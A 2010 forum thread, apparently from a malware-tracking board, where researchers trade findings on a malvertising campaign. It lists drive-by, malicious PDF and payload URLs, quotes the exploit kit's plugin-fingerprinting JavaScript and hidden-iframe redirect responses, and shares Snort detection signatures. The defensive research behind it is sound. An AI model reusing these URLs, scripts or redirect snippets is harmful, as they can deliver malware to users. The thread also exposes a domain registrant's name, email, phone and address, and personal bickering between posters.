HTTP/1.1 200 OK
Date: Mon, 24 May 2010 14:43:12 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV T
AI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI
PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-multiad-json; charset=UTF-8
Content-Length: 10536
(function(){

var multiAdPack = {
"encoding":"UTF-8",
"version":"1.1",
"reqtype":"ac",
"ads":[
{"ad":"<!-- SpaceID=2022775850 loc=AP37 noad -->\u000a<img style=\"display:none\"
 width=0 height=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=ae0af71a-6742-11df-bf
5f-bf408f606688&T=19d2poc7s%2fX%3d1274712193%2fE%3d2022775850%2fR%3dncnws%2fK%3d5
%2fV%3d8.1%2fW%3d0%2fY%3dPARTNER_US%2fF%3d2921782211%2fH%3dYWx0c3BpZD0iOTY3MjgzMT
UxIiBzZXJ2ZUlkPSJhZTBhZjcxYS02NzQyLTExZGYtYmY1Zi1iZjQwOGY2MDY2ODgiIHNpdGVJZD0iODI
4NTUxIiB0U3RtcD0iMTI3NDcxMjE5Mjk4NTUwMiIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d
1%2fJ%3d29558862&U=128h7uej0%2fN%3djLRSIkwNiZE-%2fC%3d-1%2fD%3dAP37%2fB%3d-1%2fV%
3d5\"><script>// no ads\u000a</script><!--flv has invalid value--><!--rTg has inv
alid value--><!--rTg has invalid value--><!--XCH|ae0af71a-6742-11df-bf5f-bf408f60
6688--><!--fac9.cl1.ads.adx.ac4.yahoo.com-->",
 "type":"text/html",
 "id":"0",
 "size":["160x90"],
 "slug":false,
 "secure":false},
{"ad":"<script language=\"javascript\" src=\"hXXp://adnet.media.unwited.com/cr/j/
cd/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc
\">\u000d\u000d</script>\u0
00d\u000d<noscript>\u000d\u000d<a href=\"http://us.ard.yahoo.com/SIG=15vmvpbvl/M=
600742873.600772841.409311541.408347572/D=ncnws/S=2022775850:N/Y=PARTNER_US/L=ae0
af71a-6742-11df-bf5f-bf408f606688/B=j7RSIkwNiZE-/J=1274712193000950/K=33yOa_MgRUm
ArzkSIRRKYQ/EXP=1274719393/A=1757979682871089560/R=0/X=2/SIG=12t964gb2/*http://ad
net.media.unwited.com/cr/j/clk/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=s
c\" target=\"_top\">\u000d\u000d<img src=\"http://adnet.media.unwited.com/cr/j/vi
ew/?rt=47210&sid=2421828&m=5171&ts=31&d=x&ctc=31&tm=sc\" width=728 height=90 bord
er=0>\u000d\u000d</a>\u000d\u000d</noscript><img style=\"display:none\" width=0 h
eight=0 alt=\"\" src=\"http://us.bc.yahoo.com/b?P=ae0af71a-6742-11df-bf5f-bf408f6
06688&T=19c202ntl%2fX%3d1274712193%2fE%3d2022775850%2fR%3dncnws%2fK%3d5%2fV%3d8.1
%2fW%3d0%2fY%3dPARTNER_US%2fF%3d293944772%2fH%3dYWx0c3BpZD0iOTY3MjgzMTUxIiBzZXJ2Z
UlkPSJhZTBhZjcxYS02NzQyLTExZGYtYmY1Zi1iZjQwOGY2MDY2ODgiIHNpdGVJZD0iODI4NTUxIiB0U3
RtcD0iMTI3NDcxMjE5Mjk4NTUwMiIgdGFyZ2V0PSJfYmxhbmsiIA--%2fQ%3d-1%2fS%3d1%2fJ%3d295
58862&U=13raiokei%2fN%3dj7RSIkwNiZE-%2fC%3d600742873.600772841.409311541.40834757
2%2fD%3dN%2fB%3d1757979682871089560%2fV%3d2\"><!--flv has invalid value--><!--rTg
 has invalid value--><!--rTg has invalid value--><!--MME--><!--TRK:a:175797968287
1089560,m:600742873.600772841.409311541.408347572-->",
 "type":"text/html",
 "id":"1",
 "size":["728x90"],
 "slug":false,
 "secure":false},
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on May 25, 2010, 04:22:27 pm
nertonic.com

Drive by:
http://nertonic.com/9bc16b427vc52/

PDF:
http://nertonic.com/657fs76fg87vc9/840099943
http://wepawet.iseclab.org/view.php?hash=744420e7136af84acdcbb12dd970b188&type=js

Java:
http://nertonic.com/657fs76fg87vc9/B0.php


Payload:
http://nertonic.com//657fs76fg87vc9/6875643787820
Detected as Win32/Fainli.A by Microsoft Security Essentials


Check-in post infection:
antispyware-scan.com
antispyware-scan.net



Getting referred to by ad.doubleclick.net

Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Moore on May 30, 2010, 11:00:09 am
FYI, this is still running pretty rampant
Because you still can't be bothered to send the details to the right people that's what happens rodeo guy.

YOU could have helped to stop this a lot earlier, instead you just want to keep playing your little games.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on May 30, 2010, 11:01:09 am
FYI, I know that Dshield is part of SANS and FYI we got their blocklist available for download at Bluetack.

Microsoft still has NO information from SANS or Dshield, as reported by my contacts at AdCenter / Traffic Quality Team. Just FYI, they found several other malvertisement campaigns even with the few details I was able to provide because you wanted to play the smart way.
http://stopmalvertising.com/malvertisements/alert-new-curves-malvertisement

And NO, I don't hand out my contacts from Microsoft AdCenter, Yahoo or Google / Doubleclick to rodeo kids.

You had the elements in hand to stop these campaigns but they are still running and even more malvertisement domains have been discovered.
http://msmvps.com/blogs/spywaresucks/archive/2010/05/30/1770473.aspx

Happy now ?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on May 30, 2010, 02:37:13 pm
I've alerted my contact at Yahoo about the adnet.media.unwited.com incident. Which site is that malvertisement displayed or is that again top secret too?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on May 31, 2010, 06:05:30 pm
Yahoo, without any pertinent information again, took out 3 malvertisements. There might be more ....
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 02, 2010, 02:59:33 pm
And NO, I don't hand out my contacts from Microsoft AdCenter, Yahoo or Google / Doubleclick to rodeo kids.

Good for you, then keep helping the bad guys out.

Additionally if you have nothing to actually contribute to the thread that is pertinent, it is best to stay out of it.

Yahoo, without any pertinent information again, took out 3 malvertisements. There might be more ....

Then they obviously haven't taken any time to read what I post in public or bothered to contact me. I've got a bunch more, but I think I'll stop publishing that we find it and keep it to ourselves.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on June 02, 2010, 03:52:31 pm
For over the last 4-5 years I've spend most of my time if not all on reporting malware.

Actually FYI, Yahoo / Right Media took out more since my last post as I have been continously in contact with the incident team. I have the exact number of incidents which I can't disclose in public unfortunately.

Quote
Good for you, then keep helping the bad guys out.

Yeah, sure .... that's exactly what you're doing by sending the information to the wrong people and blaming me for it. Keep doing what you do and we'll see how fast something gets pulled out of an ads network.

We see guys like you all the time ... showboat poney's ...
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 02, 2010, 04:25:43 pm
For over the last 4-5 years I've spend most of my time if not all on reporting malware.

And maybe in those multiple years you would realize that shoving copies of PCAPs around to random people on web forums can lead to termination and prosecution for violating all the security controls we have to comply with under FISMA. I'm not sending you my clients pcaps regardless, so stop asking.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: cleanmx on June 02, 2010, 04:35:05 pm
For over the last 4-5 years I've spend most of my time if not all on reporting malware.

And maybe in those multiple years you would realize that shoving copies of PCAPs around to random people on web forums can lead to termination and prosecution for violating all the security controls we have to comply with under FISMA. I'm not sending you my clients pcaps regardless, so stop asking.


hi Kimberly, hi eoin,

please slow down a bit .... both sidess....  publishing pcaps in public is bad... but i guess kimberly made a mistake...


-- gerhard
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 02, 2010, 04:48:27 pm
FYI, this is still running pretty rampant
Because you still can't be bothered to send the details to the right people that's what happens rodeo guy.

YOU could have helped to stop this a lot earlier, instead you just want to keep playing your little games.

Yea, it is not the lack of proper vetting within the business process of adding new advertising affiliates. Well, that and a complete lack of major advertising organizations following their own redirects to their affiliates constantly to observe if they are serving up malware and drive bys.

It isn't like we aren't sharing a common goal, but apparently by producing to the community what is going on without risking the data of my clients, or my own job, makes you somehow blame me for the malvertising campaigns I take the time to research and disclose. All the while you continiously refuse to provide any channels or contacts that you claim to know exist to report this information to directly. The both of you completely lack the understanding of what is required to disclose traffic from my client to any other organization.

Thats as nice as I am going to put it. Stay out of the thread unless you have actual pertinent information regarding domains to be added to the list. If you have some more personally oriented snipes to try and send, take it to PM. That is why it is there.

Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: Kimberly on June 02, 2010, 05:28:33 pm
Quote
publishing pcaps in public is bad... but i guess kimberly made a mistake...
I didn't post a complete capture including affiliate ID's in this topic ....

BTW, you can strip out confidential information about websites and or clients, just leaving in the necessary info to identify the malicious ad before handing them over to anyone, that includes official institutions or advertising networks.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 02, 2010, 07:54:31 pm
Quote
publishing pcaps in public is bad... but i guess kimberly made a mistake...
I didn't post a complete capture including affiliate ID's in this topic ....

BTW, you can strip out confidential information about websites and or clients, just leaving in the necessary info to identify the malicious ad before handing them over to anyone, that includes official institutions or advertising networks.

Affiliate ID's and domains don't matter to my client, data being POST'd back to servers after exploitation does. I post the affiliate ID's and domains so that they will become known and public so people can block them as we do. I will not be disclosing full PCAPs of my client to you so stop bringing it up.

Is this seriously the type of conduct that is deemed accecptable on this board?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: MysteryFCM on June 03, 2010, 01:07:06 pm
Can we all calm down and put this issue to rest please. I won't allow this behaviour to continue.

We're all on the same side here and meant too be helping each other take the bad guys down. If someone doesn't wish to share contacts or data then fine, that is up to them (and as far as pcaps, most corps don't allow those to be shared publicly, or indeed privately, for obvious security reasons, stripped out or otherwise), just contact me and I'll help find the appropriate contact for you.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: moranned on June 05, 2010, 09:32:39 pm
thanks to Steve for mediating this. agreed that we are all on the same team here.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 10, 2010, 05:42:12 pm
More drive bys:

hgptd.com

http://hgptd.com/g/index.php


Redirected from:
zherlova1388.newmail.ru/ypypumu.html
puaho.notlong.com
graudin4.nm.ru/ixywesuw.html
dolieb.notlong.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 11, 2010, 02:54:04 pm
More redirects to the baddie domains:

http://ir.pe/2c3o

**EDIT**

Apparently this ir.pe is just some sort of URL redirection service in spanish.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 21, 2010, 05:43:54 pm
More still ongoing:

Ad servers:
view.atdmt.com.daxitymb.com
media.fastclick.net.tribudd.com
view.atdmt.com.cidersi.com
ad.doubleclick.net.wifell.com
adnet.media.intati.com

Seeing most of the ad services over in the 95.143.193.0/24 net now. Still redirecting clients to the known bad networks full of drive bys.

Those above malvertising domains will toss you to a stats/check in site:

Check in for stats tracking:
http://generalline.co.cc/rss.php?n=cust11

Eventutally redirects you over to the actual drive by (we are supposing here as we block the destination nets on our networks):

Drive bys examples:
http://uprtx.com/rbds/mh_t.php


Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: moranned on June 22, 2010, 01:06:23 am
if this campaign follows patterns displayed by the last campaign the next exploit domains will be:

Hjoty.com   
Bumzc.com   
Potyur.com   
Palcaug.com   
Uoptyr.com   
Uprtx.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 22, 2010, 05:06:05 pm
Been working on a Snort sig to track the big malvertising campaigns responsible for most of our favorite FakeAV installs. The servers return a common form of JavaScript ompression commonly used by jquery and also used by Google and others. Luckily, the servers from google and others are not normally ngix and the ones that are ngix are serving up the javascript with the correct Content-Type instead of text/html. So based on that we created this sig and have had a pretty low FP rate for the
last day or so that has helped us identify the malvertising servers and add them to the egress filters.

Code: [Select]
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALVERTISING eval(function(p,a,c,k,e,d) JavaScript from ngix Detected"; flow:established,to_client; content:"Server\: nginx"; nocase; offset:15; depth:15; content:"Content-Type\: text/html"; nocase; distance:20; content:"eval(function(p,a,c,k,e,d)"; nocase; distance:50; classtype:bad-unknown; sid:5600046; rev:1;)
Sample packet payload:
Code: [Select]
00000245  48 54 54 50 2f 31 2e 31  20 32 30 30 20 4f 4b 0d HTTP/1.1  200 OK.
00000255  0a 53 65 72 76 65 72 3a  20 6e 67 69 6e 78 2f 30 .Server:  nginx/0
00000265  2e 37 2e 36 35 0d 0a 44  61 74 65 3a 20 4d 6f 6e .7.65..D ate: Mon
00000275  2c 20 32 31 20 4a 75 6e  20 32 30 31 30 20 31 33 , 21 Jun  2010 13
00000285  3a 32 39 3a 34 35 20 47  4d 54 0d 0a 43 6f 6e 74 :29:45 G MT..Cont
00000295  65 6e 74 2d 54 79 70 65  3a 20 74 65 78 74 2f 68 ent-Type : text/h
000002A5  74 6d 6c 0d 0a 54 72 61  6e 73 66 65 72 2d 45 6e tml..Tra nsfer-En
000002B5  63 6f 64 69 6e 67 3a 20  63 68 75 6e 6b 65 64 0d coding:  chunked.
000002C5  0a 43 6f 6e 6e 65 63 74  69 6f 6e 3a 20 6b 65 65 .Connect ion: kee
000002D5  70 2d 61 6c 69 76 65 0d  0a 58 2d 50 6f 77 65 72 p-alive. .X-Power
000002E5  65 64 2d 42 79 3a 20 50  48 50 2f 35 2e 32 2e 31 ed-By: P HP/5.2.1
000002F5  33 0d 0a 0d 0a 66 37 32  0d 0a 65 76 61 6c 28 66 3....f72 ..eval(f
00000305  75 6e 63 74 69 6f 6e 28  70 2c 61 2c 63 2c 6b 2c unction( p,a,c,k,
00000315  65 2c 64 29 7b 65 3d 66  75 6e 63 74 69 6f 6e 28 e,d){e=f unction(
00000325  63 29 7b 72 65 74 75 72  6e 28 63 3c 61 3f 27 27 c){retur n(c<a?''
00000335  3a 65 28 70 61 72 73 65  49 6e 74 28 63 2f 61 29 :e(parse Int(c/a)
00000345  29 29 2b 28 28 63 3d 63  25 61 29 3e 33 35 3f 53 ))+((c=c %a)>35?S
00000355  74 72 69 6e 67 2e 66 72  6f 6d 43 68 61 72 43 6f tring.fr omCharCo
00000365  64 65 28 63 2b 32 39 29  3a 63 2e 74 6f 53 74 72 de(c+29) :c.toStr
00000375  69 6e 67 28 33 36 29 29  7d 3b 69 66 28 21 27 27 ing(36)) };if(!''
00000385  2e 72 65 70 6c 61 63 65  28 2f 5e 2f 2c 53 74 72 .replace (/^/,Str
00000395  69 6e 67 29 29 7b 77 68  69 6c 65 28 63 2d 2d 29 ing)){wh ile(c--)
000003A5  7b 64 5b 65 28 63 29 5d  3d 6b 5b 63 5d 7c 7c 65 {d[e(c)] =k[c]||e
000003B5  28 63 29 7d 6b 3d 5b 66  75 6e 63 74 69 6f 6e 28 (c)}k=[f unction(
000003C5  65 29 7b 72 65 74 75 72  6e 20 64 5b 65 5d 7d 5d e){retur n d[e]}]


Submitted it over to the guys over at ET (EmergingThreats) so it may be in future releases if it is deemed worthy.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 22, 2010, 10:04:40 pm
if this campaign follows patterns displayed by the last campaign the next exploit domains will be:

Hjoty.com   
Bumzc.com   
Potyur.com   
Palcaug.com   
Uoptyr.com   
Uprtx.com

Definately, the all resolve to be within the 194.8.250.0/24 netblock. The drive by domains will flip around inside that netblock every couple of weeks or so.

Some of the other check-in sites for stats are:
jahsgdqtuz.co.cc
generalline.co.cc


New malvertising sites:
view.atdmt.com.landsm.com
media.rseeting.com


New payload/malware sites:
http://nwsplt.com/pqmmh/_dwfxw.php

***EDIT***

Looks like if the URL has already been visited, it redirects the client to Google.com based upon if the client IP has already made the request before.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: moranned on June 22, 2010, 10:33:16 pm
Eoin, thanks for keeping us all up to date on this and putting together a snort sig to detect these campaigns.

the earlier campaign hosts what appears to be SEO Sploit packs on 194.8.250.60.

this most recent outbreak is also hosting what appear to be SEO Sploit packs on 194.8.250.15.

All the exploit domains in both campaigns are registered to:

Pat Casey
patcasey@xhotmail.com
+1.7149214718
fax: +1.7149214718
1201 E. Candlewood
Orange CA 92867
us

Ive observed a cocktail of Bamital, TDSS, and Rogue AV dropped during these campaigns.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 23, 2010, 05:33:06 pm
Just trying to give as much as I get from everyone else who contributes!  :)

Check-in:
webclickst.co.cc

Drive-by:
fjoty.com

Malicious PDF:
http://fjoty.com/pw/hxnrgy/ghyv.pdf

Keep seeing the URL's rotate, might be time based?
http://fjoty.com/jz/cvra.php
http://fjoty.com/pw/za_pumsvx.php


When you load the page the first time, you get this back:

Code: [Select]
<html>
<body>
<script>
document.write('<form action="za_pumsvx.php" method="post"><input type="hidden" name="id" value="" />');
var id="adbac98ea8cc4816ae7652f9ade94ac6&n";
if(navigator.javaEnabled())
{
id="adbac98ea8cc4816ae7652f9ade94ac6&j";
}
for(var i=0;i<navigator.plugins.length;i++)
{
if(navigator.plugins[i].description.indexOf("Adobe Acrobat")!=-1)
{
id=id+"p";
break;
}
if(navigator.plugins[i].description.indexOf("Adobe PDF")!=-1)
{
id=id+"p";
break;
}
}
var f=document.forms[0];
f.id.value=id;
f.submit();
</script>
</body>
</html>


It enumerates the browser plugins and POST's back that info to the server which picks the exploit to serve up. So you would have a POST like this coming back from the client after executing the above JavaScript:

Code: [Select]
POST /pw/za_pumsvx.php HTTP/1.1
Host: fjoty.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fjoty.com/pw/za_pumsvx.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 40

id=adbac98ea8cc4816ae7652f9ade94ac6%26np

I am going to try and get some more traffic from this and see how easy it may be to sig the POST from the client. The id= sticks out pretty easy, I just dont think it is consistant becuase the server appears to go off of the length of the random string to determine which exploits to serve up. Should be able to sig it with a little regex though.

***EDIT***

Here is a rough Snort sig with minimal testing for clients POST'ing to the SEO Exploit kits to get themselves some malicious Java or PDF's:

Code: [Select]
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALVERTISING POST to SEO Exploit Kit"; flow:established,to_server; content:"POST "; depth:5; nocase; content:".php HTTP"; nocase; distance:0; pcre:"/id=[a-f0-9]{32}(&|%26)(np|jp|n|j)/iR"; classtype:bad-unknown; sid:5600047; rev:2;)
This should help track people who have been exploited by the PDF from the drive by:
Code: [Select]
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALVERTISING Adobe Exploited Check-In"; flow:established,to_server; content:"GET "; nocase; depth:4; uricontent:".php?&&reader_version="; nocase; classtype:trojan-activity; sid:5600048; rev:1;)
Sig developted from the following wepawet report:
http://wepawet.iseclab.org/view.php?hash=a47d8bc28e859963220c777818a938a1&type=js
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 24, 2010, 09:34:14 pm
Exploit domain of the day:

fruuf.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 25, 2010, 06:12:03 pm
Domains recap for the last few weeks.

Malvertising Domains (Serve up Obfuscated JavaScript that redirects to check-in sites):

a123.g.doxoni.com
a123.g.honettee.com
a123.g.manilis.com
a123.g.ophori.com
a123.g.rogloard.com
ad.doubleclick.net.leastive.com
ad.doubleclick.net.mattoft.com
ad.doubleclick.net.wifell.com
ad.view.expiage.com
adnet.media.intati.com
epholo.com
h7.ch.adtech.com.niklip.com
mattoft.com
media.fastclick.net.tribudd.com
media.fastclick.net.wifell.com
media.mattoft.com
media.rseeting.com
media.torpalis.com
rismit.com
sconect.com
view.atdmt.com.cidersi.com
view.atdmt.com.daxitymb.com
view.atdmt.com.landsm.com
view.j9.atlassolutions.com.xbevs.com



Check-in sites that redirect to SEO Exploit drive by sites:

canteeve.com
deltastats0.co.cc
dmset.co.cc
fastclick01.co.cc
generalline.co.cc
generalline.co.cc
getazxvision.co.cc
globalmicro.co.cc
hlrotio.co.cc
jahsgdqtuz.co.cc
linestreams.co.cc
mediaclickz.co.cc
mediafasts.co.cc
microjet.co.cc
microtrendsa.co.cc
neoplezas.co.cc
neotrapis.co.cc
orionst11.co.cc
securetrend.co.cc
sigmapopts.co.cc
statstoplex.co.cc
stcorp-as.co.cc
totaltrends.co.cc
weatherspacex.co.cc
webcharterw.co.cc
webclickst.co.cc


SEO Exploit drive by sites:

aiosstatsungenett.com
bumzc.com
chiklomba.com
fjoty.com
fnmaw.com
fruuf.com
ghutren.com
google.analytics.com.xygppovpmbh.info
google.analytics.com.qapvjonkksh.info
hjoty.com
kirtunmil.com
ljutrum.com
palcaug.com  
potyur.com  
preteritness.com
qtulina.com
retykub.com
sertgukl.com
statsianighteworkes.com
potyur.com
tjerhan.com
ttyur.com
unastatiomask.com
uoptyr.com  
uprtx.com
www.obsidallynd.com


Domains referring clients to the malicious advertising services:
Code: [Select]
1077theend.com
1077thelake.com
3rdnewhampshire.webs.com
.997kiss.com
997kiss.com
a123.g.honettee.com
a123.g.rogloard.com
actionsportsblips.dailyradar.com
ad.ca.doubleclick.net
ad.doubleclick.net
ad.wikinvest.com
aetv.com
a.farlex.com
amertribes.proboards.com
angelmariem.webs.com
anorak.co.uk
arts.nationalpost.com
ashraf786.proboards.com
associatedcontent.com
audioreview.com
ballhype.com
bdv.bidvertiser.com
bemidjitakeakidfishing.webs.com
biography.com
calgaryherald.com
canada.com
cantonveterinaryhospital.webs.com
carnivoraforum.com
carreview.com
cheaptickets.com
classifieds.mtbr.com
classifieds.outdoorreview.com
combineforums.proboards.com
community.history.com
content.mtbr.com
countryblips.dailyradar.com
courses.golfreview.com
crosstieentertainment.webs.com
dailymail.co.uk
dailyradar.com
daysblips.dailyradar.com
designsbyanna.webs.com
detroit4lyfe.com
dreamriverstables.webs.com
dynamic.nasdaq.com
eagleridgervpark.webs.com
earthblips.dailyradar.com
edmontonjournal.com
faceoff.com
financialpost.com
fixya.com
forums.golfreview.com
forums.mtbr.com
forums.outdoorreview.com
forums.roadbikereview.com
froggy101.com
gallery.mtbr.com
gallery.photographyreview.com
gallery.roadbikereview.com
garagejournal.com
geekblips.dailyradar.com
.glam.com
golfreview.com
google.com
gscnccampstaffalumni.webs.com
habsinsideout.com
hair2dye4salon.com
history.com
hodagbassmasters.webs.com
hotfrog.com
ibiker.proboards.com
idiomproductions.webs.com
intellicast.com
kmbz.com
kossan.se
lablips.dailyradar.com
life.nationalpost.com
live.nationalpost.com
lolblips.dailyradar.com
lovingrats.webs.com
manitoudays.webs.com
maximumitblips.dailyradar.com
mediablips.dailyradar.com
members.webs.com
mentalfloss.com
mhsfashion.webs.com
missblackinternational.webs.com
mommyblips.com
montrealgazette.com
movieblips.dailyradar.com
mtbr.com
musicblips.dailyradar.com
n.admagnet.net
naruto-manga-spoiler.com
nasdaq.com
newrock933.com
news.nationalpost.com
newyorkblips.dailyradar.com
orbitz.com
outdoorreview.com
pchardwareblips.dailyradar.com
pgproductionsvocalstudio.webs.com
photoblips.dailyradar.com
photographyreview.com
plugins.wikinvest.com
pnta.proboards.com
process.advertangel.com
quotes.nasdaq.com
rapturefightclan.webs.com
reviews.carreview.com
reviews.mtbr.com
reviews.photographyreview.com
reviews.roadbikereview.com
revolverblips.dailyradar.com
rlslog.net
roadbikereview.com
scienceblips.dailyradar.com
showhype.com
shrinkingjeans.net
slacker.com
slitherbriggs.webs.com
soft-4all.com
sportsfanlive.com
sports.nationalpost.com
starzband.webs.com
svc1.m5prod.net
syndication.adagora.com
tampaspinsweather.webs.com
tennessean.com
theofficeblips.dailyradar.com
thesky973.com
thestarphoenix.com
throttleblips.dailyradar.com
timeaftertimeonlinedrama.webs.com
timescolonist.com
trails.mtbr.com
tvblips.dailyradar.com
usatoday.com
vancouversun.com
waitingfornextyear.com
wallstreetblips.dailyradar.com
webcache.googleusercontent.com
webs.com
wgr550.com
windsorstar.com
worldofsnails.webs.com
wrestlingblips.dailyradar.com
wrko.com
wwl.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 25, 2010, 08:13:20 pm
This Snort sig helps tracking the new drive by domains quite effectively:

Code: [Select]
alert TCP $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"MALVERTISING hidden iframe served by ngix"; flow:established,to_client; content:"Server\: nginx"; nocase; offset:15; depth:15; content:"<iframe src="; content:"style=\"visibility\:hidden\;\" width=\"1\" height=\"1\"></iframe>"; classtype:bad-unknown; sid:5600049; rev:1;)
Server response signature was developed from:

Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 24 Jun 2010 00:35:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 137

<html>
<body>
<iframe src="http://fjoty.com/pw/za_pumsvx.php" style="visibility:hidden;" width="1" height="1"></iframe>
</body>
</html>

False positives have been non-existant so far for the past few hours.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 28, 2010, 04:54:58 pm
Malvertising Servers:
view.atdmt.com.requild.com

Check-in/Redirectors:
trendanalytics2010.co.cc
vcztuokghrtq.co.cc

New drive-bys (change/rotate every 24 hours or so):
http://uytim.com/vz/tbbncwdv_.php - Saturday
http://kobqq.com/vc/vcc_vdz.php - Sunday
http://yopte.com/zs/bzkvfl.php - Monday (Today)
http://yopte.com/wb/adbplhr.php

More info:
Drive bys are single shot based on source IP (then they redirect to google.com on subsequent visits, even after a domain name change). Also, the JavaScript is broken and will not execute in IE8 unless you are using compatibility mode.
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: MysteryFCM on June 28, 2010, 08:31:37 pm
Nice catch :)

/edit

Do you have the full URL for vcztuokghrtq.co.cc please? (doesn't resolve here, and nothing on the search engines for it)

/edit 2

And this one please;

view.atdmt.com.requild.com
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 29, 2010, 03:07:44 pm
Yes indeed, here ya go.

Nice catch :)

/edit

Do you have the full URL for vcztuokghrtq.co.cc please? (doesn't resolve here, and nothing on the search engines for it)

URL:  http://vcztuokghrtq.co.cc/north.php?n=cust12
Referrer: http://www.fixya.com/support/p1133609-orange_steelcore_9_surfboard_lock_snowb

Response:

Code: [Select]
HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 27 Jun 2010 <REMOVED>
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.13
Content-Length: 135
<html>
<body>

<iframe src="http://kobqq.com/vc/vcc_vdz.php" style="visibility:hidden;" width="1" height="1"></iframe>

</body>
</html>



Quote
And this one please;

view.atdmt.com.requild.com

URL: http://view.atdmt.com.requild.com/MON/jview/dlnkkmgr124536131mon/direct/01/?rn=11386816&click=
Referrer: http://mac.softpedia.com/get/Math-Scientific/Best-Pair-II.shtml
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 29, 2010, 03:12:49 pm
New stuff for today:

Malvertising:
http://js.zedo.com.rc1.hiskweb.com/cr/j/cd/?rt=47210&sid=223417424&m=5171&ts=31&d=x&ctc=31&tm=sc

Redirect:
http://globalsearch5.co.cc/amiga.php?n=cust12

Exploit:
http://nhytx.com/wt/_duusz.php
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: MysteryFCM on June 29, 2010, 06:16:27 pm
Cheers :)
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: SysAdMini on June 29, 2010, 06:19:25 pm
Do I need a special referer for

Code: [Select]
js.zedo.com.rc1.hiskweb.com/cr/j/cd/?rt=47210&sid=223417424&m=5171&ts=31&d=x&ctc=31&tm=sc
??

Script decodes to
Code: [Select]
<a href='http://www.raffaello-network.com/' target='_blank'><img src='http://js.zedo.com.rc1.hiskweb.com/banners/load.php?id=223417424' border='0' ></a>
Do you find more ?
Title: Re: adnet.media.*.com domains - NEW TITLE
Post by: eoin.miller on June 29, 2010, 08:20:03 pm
The obfuscated code I have from pcap from the js.zedo.com.rc1.hiskweb.com is as follows:

Code: [Select]
